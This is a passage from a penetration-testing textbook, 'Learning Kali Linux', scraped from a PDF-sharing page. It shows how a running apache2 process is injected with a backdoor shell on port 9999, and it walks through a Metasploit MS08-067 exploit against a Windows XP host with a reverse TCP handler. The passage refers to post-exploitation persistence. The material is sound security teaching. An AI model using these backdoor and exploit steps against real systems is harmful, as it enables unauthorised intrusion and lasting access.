Learning Kali Linux




Download 22,59 Mb.
Pdf ko'rish
bet184/225
Sana14.05.2024
Hajmi22,59 Mb.
#232856
1   ...   180   181   182   183   184   185   186   187   ...   225
Bog'liq
learningkalilinux

Maintaining Access | 199

 register info:
-----------------------------------------------------------
eax value: 0xfffffdfe ebx value: 0x0
esp value: 0xbfb15e30 eip value: 0xb7fe2410
------------------------------------------------------------
[
+
]
new esp: 0xbfb15e2c
[
+
]
payload preamble: fork
[
+
]
injecting code into 0xb7fe3000
[
+
]
copy general purpose registers
[
+
]
detaching from 5196
[
+
]
infected!!!
netstat -atunp | grep 9999
tcp
0
0
0.0.0.0:9999 0.0.0.0:* LISTEN 7268/apache2
tcp
0
0
192.168.86.47:9999 192.168.86.30:34028 ESTABLISHED 7269/sh
We now have a backdoor. The problem with this, though, is that we’ve only infected
the running process. This means that if the process were killed and restarted, our
backdoor would be lost. This includes if the system gets rebooted. This is one way to
create a backdoor, but don’t expect it to be permanent. You’ll want to make sure you
have something else in place long-term.
If the system you have compromised is a Windows system, you can use one of the
post-exploitation modules available. Once you have a Meterpreter shell open to your
Windows target, you can use the 
persistence
module to create a more permanent way
of accessing the system whenever you want to. Again, this module is available only if
you have compromised a Windows host. No corresponding modules are available for
Linux or macOS systems. To demonstrate this, we’re going to use an old Windows XP
system. We’ll use a vulnerability that was reliable for a long time, even on newer sys‐
tems than those running XP. This is the vulnerability announced in the Microsoft
advisory MS08-067. You can see the compromise in 
Example 6-22
.
Example 6-22. Compromise using MS08-067
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit
(
windows/smb/ms08_067_netapi
)

set 
RHOST 192.168.86.57
RHOST
=
> 192.168.86.57
msf exploit
(
windows/smb/ms08_067_netapi
)
> exploit
[
*
]
Started reverse TCP handler on 192.168.86.30:4444
[
*
]
192.168.86.57:445 - Automatically detecting the target...
[
*
]
192.168.86.57:445 - Fingerprint: Windows XP - Service Pack 
2
- lang:Unknown
[
*
]
192.168.86.57:445 - We could not detect the language pack, defaulting to English
[
*
]
192.168.86.57:445 - Selected Target: Windows XP SP2 English 
(
AlwaysOn NX
)
[
*
]
192.168.86.57:445 - Attempting to trigger the vulnerability...
[
*
]
Sending stage 
(
179779
bytes
)
to 192.168.86.57

Download 22,59 Mb.
1   ...   180   181   182   183   184   185   186   187   ...   225




Download 22,59 Mb.
Pdf ko'rish